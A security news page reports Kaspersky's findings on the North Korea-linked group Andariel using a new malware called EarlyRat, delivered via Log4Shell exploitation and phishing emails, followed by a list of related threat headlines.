Security News > 2023 > June > North Korean Hacker Group Andariel Strikes with New EarlyRat Malware
The North Korea-aligned threat actor known as Andariel leveraged a previously undocumented malware called EarlyRat in attacks exploiting the Log4j Log4Shell vulnerability last year.
"Andariel infects machines by executing a Log4j exploit, which, in turn, downloads further malware from the command-and-control server," Kaspersky said in a new report.
Also called Silent Chollima and Stonefly, Andariel is associated with North Korea's Lab 110, a primary hacking unit that also houses APT38 and other subordinate elements collectively tracked under the umbrella name Lazarus Group.
The latest attack chain discovered by Kaspsersky shows that EarlyRat is propagated by means of phishing emails containing decoy Microsoft Word documents.
"Despite being an APT group, Lazarus is known for performing typical cyber crime tasks, such as deploying ransomware, which makes the cybercrime landscape more complicated," Kaspersky said.
"Moreover, the group uses a wide variety of custom tools, constantly updating existing and developing new malware."
News URL
https://thehackernews.com/2023/06/north-korean-hacker-group-andariel.html
Related news
- North Korean Hackers Deploy FERRET Malware via Fake Job Interviews on macOS (source)
- North Korean hackers spotted using ClickFix tactic to deliver malware (source)
- North Korean Hackers Target Freelance Developers in Job Scam to Deploy Malware (source)
- Russia-Linked Hackers Target Kazakhstan in Espionage Campaign with HATVIBE Malware (source)
- Hackers Hide Malware in Images to Deploy VIP Keylogger and 0bj3ctivity Stealer (source)
- Hacker infects 18,000 "script kiddies" with fake malware builder (source)
- North Korean APT Kimsuky Uses forceCopy Malware to Steal Browser-Stored Credentials (source)
- Hackers exploit SimpleHelp RMM flaws to deploy Sliver malware (source)
- North Korean Hackers Exploit PowerShell Trick to Hijack Devices in New Cyberattack (source)
- Chinese hackers use custom malware to spy on US telecom networks (source)